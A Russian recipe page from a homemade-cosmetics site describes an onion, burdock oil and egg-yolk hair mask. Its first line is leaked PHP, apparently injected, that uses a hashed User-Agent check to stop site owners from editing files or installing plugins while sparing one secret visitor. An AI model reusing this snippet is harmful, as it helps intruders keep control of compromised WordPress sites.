if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт натуральной укрепляющей маски для волос с луком | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт натуральной укрепляющей маски для волос с луком

Хотите, чтобы ваши волосы красиво блестели и были крепкими? Приготовьте в домашних условиях укрепляющую маску для волос.

Хоти­те, что­бы ваши воло­сы кра­си­во бле­сте­ли и были креп­ки­ми? При­го­товь­те в домаш­них усло­ви­ях укреп­ля­ю­щую мас­ку для волос.

Для ее приготовления необходимо иметь:

  • 1 голов­ку лука;
  • репей­ное мас­ло (2 ч.л.);
  • яйцо (1шт);
  • лимон­ный сок (3 капли);
  • пше­нич­ный хлеб.

Приготовление

Для при­го­тов­ле­ния мас­ки для волос необ­хо­ди­мо очи­стить и нате­реть лук на тер­ке. Затем необ­хо­ди­мо отжать из него сок. Мож­но исполь­зо­вать не тер­ку, а блен­дер. К луко­ви­це необ­хо­ди­мо доба­вить репей­ное мас­ло. Затем, пред­ва­ри­тель­но отде­лен­ный жел­ток от бел­ка, сле­ду­ет доба­вить к мяко­ти лука. Заклю­чи­тель­ным эта­пом будет добав­ле­ние к дан­ной сме­си лимон­но­го сока.

Применение

При­го­тов­лен­ную смесь сле­ду­ет сра­зу нане­сти на воло­сы. Затем всю голо­ву необ­хо­ди­мо завер­нуть в пище­вую плен­ку, а свер­ху – поло­тен­цем. В резуль­та­те обра­зу­ет­ся паро­вая баня. После это­го необ­хо­ди­мо подер­жать в таком состо­я­ние голо­ву око­ло 20 минут. Потом поло­тен­це и плен­ка сни­ма­ют­ся, голо­ву моют в теп­лой воде с шам­пу­нем. А опо­лас­ки­вать воло­сы необ­хо­ди­мо с лимон­ным соком, кото­рый и убе­рет запах лука. Дан­ную мас­ку мож­но исполь­зо­вать 1 раз в неделю.

Совет

Пше­нич­ный хлеб помо­жет нане­сти такую мас­ку на воло­сы лег­ко и про­сто. Он так­же бла­го­твор­но вли­я­ет на сами воло­сы. Для это­го необ­хо­ди­мо в при­го­тов­лен­ную мас­су накро­шить хлеб и хоро­шень­ко пере­ме­шать. Полу­чен­ная каш­ка будет удоб­но нано­сить­ся на поверх­ность голо­вы и воло­сы. Это сред­ство помо­жет сде­лать уход за воло­са­ми немно­го дешев­ле, но намно­го полезнее.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!